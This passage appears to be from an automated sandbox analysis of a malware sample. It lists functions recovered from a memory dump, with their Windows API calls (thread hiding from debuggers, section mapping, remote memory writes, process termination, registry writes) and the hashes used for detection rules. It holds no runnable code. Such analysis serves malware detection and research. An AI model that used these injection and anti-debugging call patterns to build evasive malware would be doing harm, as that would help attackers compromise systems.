                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0214074C), ref: 02140A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 3637ad903b4ffc73ab5aa65ac6d9e10f0563131fb0e893ce303e404957812ea5
                              • Instruction ID: 8c809802cb9d205e33d2d13473ec167609874f262bfe6396804b6a50ed23e783
                              • Opcode Fuzzy Hash: 3637ad903b4ffc73ab5aa65ac6d9e10f0563131fb0e893ce303e404957812ea5
                              • Instruction Fuzzy Hash: 5A41E2B7401315AFCA48CF24EA99F54B716EF69360F008355E6182F2ECDB7469428F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02148F0D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02149110
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction ID: 339b742819a6004c385564eac15cd04e532eedc3516210936737af3776858a19
                              • Opcode Fuzzy Hash: 0169d66fd928d0876fc0caffb4e804adca6fd3da98d23dd1379462cd8b665cd3
                              • Instruction Fuzzy Hash: 8141BB33405605DFCF18CF24EA98B69B726EF6A334F00935AD5181B1E9DB7858828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02149012, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02149110
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction ID: d66eaa9cc4bbc94cdbb229b3c6976097cfc25617669930d5500349d1244beb37
                              • Opcode Fuzzy Hash: 02441f77ef0c01e9454345f809c156dc706a0b6efd0a448e091951d7fdcfa906
                              • Instruction Fuzzy Hash: 1241A833405605CFCF18CF24EA99B69B726EF6A334F00935AD5181B1EDCB7855828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021470B8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0214074C), ref: 02140A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: e9997e5dd5a77e7459c67e679e2deb1b3ed95a146ae482b66a8b77a36f338ac5
                              • Instruction ID: f33e3430d56d1e4fa4b7c804390edcb9576ae2ef22a090b8d3af9986eacbc319
                              • Opcode Fuzzy Hash: e9997e5dd5a77e7459c67e679e2deb1b3ed95a146ae482b66a8b77a36f338ac5
                              • Instruction Fuzzy Hash: 032107746C0305AEFF145E608C91BEA76929F4A768F504129EE9D5B2C0DF75EC42CE41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02148CE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Strings
                              • y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U, xrefs: 02149110
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 1323581903-2268763764
                              • Opcode ID: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction ID: 5da73cd91233f2ea15895babade359f306c83a3fedd826297fc14b3dcc00ff35
                              • Opcode Fuzzy Hash: 935b397d3c465e875a6cd4ac6df497da5e70b392ebd4587b6f8eef49c2e7e564
                              • Instruction Fuzzy Hash: 92312930684605CEEF299E34C8987AF3656AF4733DF9A526AC95E8B1D1CB3484C4C701
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02147088, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77nativethreadCOMMON
                              Download Yara Rule
                              APIs
                              • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,0214074C), ref: 02140A4D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InformationThread
                              • String ID: 1.!T
                              • API String ID: 4046476035-3147410236
                              • Opcode ID: 9497109f6d3084fd2b5641aefcac50174b11ddcf78b9c6eb7223a8f7cc936ef3
                              • Instruction ID: 7e1380e1e51001c707ef72ed01655f78804444a85437870715bb06bb9b232fb0
                              • Opcode Fuzzy Hash: 9497109f6d3084fd2b5641aefcac50174b11ddcf78b9c6eb7223a8f7cc936ef3
                              • Instruction Fuzzy Hash: FB21F3B4680301AFEB14AF648C91BD977929F59768F544225BE6C2B2C0CF74EC01CA45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0214310A, Relevance: 1.7, APIs: 1, Instructions: 248nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021437C3
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: e107bc7f7b01ac7e8782136ff2396909ef1fc6edd9ff7709a0323672e9eeaccc
                              • Instruction ID: e42271833910b6de1bd220a3e5ab045142fa2b6c989811918ddd20abe93acdd4
                              • Opcode Fuzzy Hash: e107bc7f7b01ac7e8782136ff2396909ef1fc6edd9ff7709a0323672e9eeaccc
                              • Instruction Fuzzy Hash: DD91D4B1281249BFFF255F24CC45BE97A66FF44704F214128FE48AB2D0CBBA9594DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02143187, Relevance: 1.7, APIs: 1, Instructions: 228nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021437C3
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 618c341106937c224e0c435043f6f05295e516e6f3a9ab25d2fead6b8bc7ba91
                              • Instruction ID: 37ad21cdb100e419d0be6729b45faaacdca0cc35f14afab607b5428147091fb2
                              • Opcode Fuzzy Hash: 618c341106937c224e0c435043f6f05295e516e6f3a9ab25d2fead6b8bc7ba91
                              • Instruction Fuzzy Hash: AF9138B2141209AFEB148F14DD59FE8BB26FF18310F108329FA185B2E9CBB95581CF84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021432EA, Relevance: 1.7, APIs: 1, Instructions: 199nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021437C3
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 22eeea5350ccaecbde2c97f57185d58107c7a804b4f50a6555705a45550ca15b
                              • Instruction ID: b546e9569c49896db0ecf809d6a5b5ce7f7ab732e715163509acb5c7c64cf734
                              • Opcode Fuzzy Hash: 22eeea5350ccaecbde2c97f57185d58107c7a804b4f50a6555705a45550ca15b
                              • Instruction Fuzzy Hash: F381F4B2141249AFEB68CF14DD59FE8B626FF18310F108325F6585F2E9CBB955818F84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021434F5, Relevance: 1.6, APIs: 1, Instructions: 130nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021437C3
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 11132b9fa2c39009c4da43e460fe1e8b3f018c05640d141d5daecd013adc83aa
                              • Instruction ID: c978e791db1f8a6e801789d977db2134cb3aa8cb35f1f8deba7b1ce4a2d61919
                              • Opcode Fuzzy Hash: 11132b9fa2c39009c4da43e460fe1e8b3f018c05640d141d5daecd013adc83aa
                              • Instruction Fuzzy Hash: 0551D477401209AFDB58CF14EE99BA8B726FF68360F008365E6185B2FDDB7415828F85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0214911A, Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction ID: a9c682dfc8c32b992ac19aba30146e2851938c0afde45231a938691decc08438
                              • Opcode Fuzzy Hash: 54a94929fee6eadf382035450c646e60fb2376eadaf4714c376d2dd3816b245c
                              • Instruction Fuzzy Hash: E341BA33405605DFCF18CF24EA98B69B726FF6A334F00935AD1181B1EDCB7815828B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021436AE, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 021437C3
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              • Opcode ID: 4aa657c7a155d8a1720fd16a7485b86e8b714806fdc3d59e61a552f72ac0176f
                              • Instruction ID: 9799645bc676d9c54458ba0481e97aaa504bed923df55b30a3644b3fae29f610
                              • Opcode Fuzzy Hash: 4aa657c7a155d8a1720fd16a7485b86e8b714806fdc3d59e61a552f72ac0176f
                              • Instruction Fuzzy Hash: 4C41CC77411509EFCA48CF24EA99EA8BB26FF6C320F009365E2181B1FDDA7415828FC5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021492AE, Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtMapViewOfSection.NTDLL(00000004,?,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 021493D6
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction ID: d678fab6eb49febebfd90de6618f4d1a609da25a37ab0b097700b71027fa8cce
                              • Opcode Fuzzy Hash: 7a6503a073fbe0e6be4388ce8c19de922eee8f5dd3025e9c3dedeac10cfd2441
                              • Instruction Fuzzy Hash: 9C319977415516DF8A4CCF24E69D828B72AFF6A370300935AD2141F1FDDA7415828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021487FD, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021482E2,00000040,02140A2A,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02148816
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                              • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                              • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02140B98, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 364COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: W.E$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U$y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 0-3368095338
                              • Opcode ID: b00121ad8b0649bfc57cbeeb775ac7c077d93440dcaaaa052e4c53e6235dc975
                              • Instruction ID: 0e2bb17cbf5588422a4aa17236012d5df9e869c9094dc7b228107f19fb12938a
                              • Opcode Fuzzy Hash: b00121ad8b0649bfc57cbeeb775ac7c077d93440dcaaaa052e4c53e6235dc975
                              • Instruction Fuzzy Hash: 9AD1AA729C0204AFDB289F24CD98FE87726EF56324F144229E94C5B1E5CF79A882CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02140BFF, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02143B00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: f1b22a8722dea5756648d0af83c2de20dab743b2904e6c978dc5c6d6d518502c
                              • Instruction ID: 3a9e84cf5a340d8051cb627faa4e1c76bf753a2501fd3e6212a4bfc34ec51da0
                              • Opcode Fuzzy Hash: f1b22a8722dea5756648d0af83c2de20dab743b2904e6c978dc5c6d6d518502c
                              • Instruction Fuzzy Hash: 71719D729C1204AFDB288F24DD98FF8B71AEF56354F144229E94C571D4CF39A8868A51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02140D7B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02143B00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: eb99c11291603696b9cad04f4a2219f0b5de5450c7cddc3a570fcb09d9eeb7a3
                              • Instruction ID: 652aafdf7604e5aa74974fcc8fc408cf0678b6ae36fc0bfeefa14326ecf03243
                              • Opcode Fuzzy Hash: eb99c11291603696b9cad04f4a2219f0b5de5450c7cddc3a570fcb09d9eeb7a3
                              • Instruction Fuzzy Hash: 5B51A173881204EFDB18CF24DE59FA8A716EF56364F108319D45C1B1E8CF7869828F51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02140ECF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02143B00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: c7a599d85bf64b9d8138eab6948e88540e580039dcca48462e3fee89a7626fcf
                              • Instruction ID: f74054f7ca0e7d3988ddc14a9c26aec83fda13d5d8e98d470e5227170c921751
                              • Opcode Fuzzy Hash: c7a599d85bf64b9d8138eab6948e88540e580039dcca48462e3fee89a7626fcf
                              • Instruction Fuzzy Hash: A9510B73495204EFCB1CCF24EA99B68A715EF66360F10831AD41C5B1EDCF7869828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0214449E, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02144FA8
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 5a3f8738e5c44e15a6c39672ff626bcfc7f435a7a84ac63d1c5b0b09a9098430
                              • Instruction ID: 1873a7c20fe8c4f2e2101a0a73daf0adeac2a35936f667a95b68ab62af1a828b
                              • Opcode Fuzzy Hash: 5a3f8738e5c44e15a6c39672ff626bcfc7f435a7a84ac63d1c5b0b09a9098430
                              • Instruction Fuzzy Hash: 7E618B77419616DF8648CF24EA6A814BB26FF6A3A0300D399D1141F1FEDA7419428FD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02144450, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02144FA8
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: bbc0003e053bec9f1d05a30c9c7b30947e054c67e20b79643b6622e039e3bba4
                              • Instruction ID: 5d67c1bbf6664a2d8cfb5610e9081bee6f3e3eb46c8c6b24a1fd67b55a1bbc51
                              • Opcode Fuzzy Hash: bbc0003e053bec9f1d05a30c9c7b30947e054c67e20b79643b6622e039e3bba4
                              • Instruction Fuzzy Hash: 58511677409655DFC718CF24D669A59BB22FF6A360F008359C0981F2EEDB701942CF96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02144406, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02144FA8
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9f4dab3aaff9c29be0b0896d2621e426f15d918f34bf066a454fd56aabdeb31d
                              • Instruction ID: 9f48356654294c23d01ae768020f225fe51cd958a87af1cb80aeefc6f8025cee
                              • Opcode Fuzzy Hash: 9f4dab3aaff9c29be0b0896d2621e426f15d918f34bf066a454fd56aabdeb31d
                              • Instruction Fuzzy Hash: C5412CB741A6559FCB08CF24E66AA15BF21FF6A360B008389D0541F1FEDAB41902CFD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02144D2A, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02144FA8
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: b2ac45d12963989ef82481055789078bf57d4a38e47d2209662e112c5c29e9df
                              • Instruction ID: b6a4e7810d6cd509b0c8b78eb75dc59479d952690c087d995901199180524944
                              • Opcode Fuzzy Hash: b2ac45d12963989ef82481055789078bf57d4a38e47d2209662e112c5c29e9df
                              • Instruction Fuzzy Hash: 8C41FE7741A6559F8708CF24E6AA814BF21FF6A3603009399D0541F1FEDA741943CBD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02144449, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02144FA8
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a12308ca5e82b66509fed5511bf405bcea7043c41f7bfba579aed47c916f8cf8
                              • Instruction ID: 5d1a08017da1de15f961466d659980655dce94c32e721f103d637ef65e4ab0fb
                              • Opcode Fuzzy Hash: a12308ca5e82b66509fed5511bf405bcea7043c41f7bfba579aed47c916f8cf8
                              • Instruction Fuzzy Hash: 2821A9BB4156159F8648CF24E65A814BB25EFAA370300D396D1141F1FEDA742A438FE6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021411BE, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02143B00
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 111fc75c17d94bb1bdb5bcc1c5eafa3a19b9961662d2fe220cae4aed841a499d
                              • Instruction ID: 9602a55854010dde429123c050c7f5630bbf0bf26652a4d5dc27dcee7b23f096
                              • Opcode Fuzzy Hash: 111fc75c17d94bb1bdb5bcc1c5eafa3a19b9961662d2fe220cae4aed841a499d
                              • Instruction Fuzzy Hash: 9321BC77419505EFC648CF24EA5DC18BB25FF7A370700D39A90181F1EEDA7425428BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02141141, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02143B00
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: e84d1265c2a56a1d37668c674ffb2be7412c6984f9c56820587bab57e57e1313
                              • Instruction ID: e24c44e1792cc885b2ff2229b498ed59461ad2b53c5490283d409ffcc43a802e
                              • Opcode Fuzzy Hash: e84d1265c2a56a1d37668c674ffb2be7412c6984f9c56820587bab57e57e1313
                              • Instruction Fuzzy Hash: 78112B306C4385FEFB306F748D54BE92A566F42718F244219AC5C951D1CF799949CF11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02146D52, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(02144FFA,?,?,0214074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02146D98
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction ID: bce2db9e786efaa453e8df6c2f45bc65b51d4edecaacda8cf7a738ef0252357e
                              • Opcode Fuzzy Hash: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction Fuzzy Hash: 2DC08C90C61000AA9A3D0AB20A28E3F14298F8A624F004D2CB92EA21004F6184008A72
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02143FF4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02143FD4,0214401A,02140A54,?,?,?,0214074C,2D9CC76C,DFCB8F12), ref: 02144008
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                              • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02141AE8, Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegSetValueExA.KERNELBASE(?,021451B1,00000000,00000001,?,?,?,?,?,?,021412D9,?,?), ref: 02141AF2
                              Memory Dump Source
                              • Source File: 0000000C.00000002.334933854.0000000002140000.00000040.00000001.sdmp, Offset: 02140000, based on PE: false
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 64b538f98a15a7b66f9e13adba0aec8f6fd2ddc537792962f6e1b7b6ef252922
                              • Instruction ID: 7b67aafb765df1ba0a9075a8e93e6a42cc2380995550fc52504d8c73627d7a6f
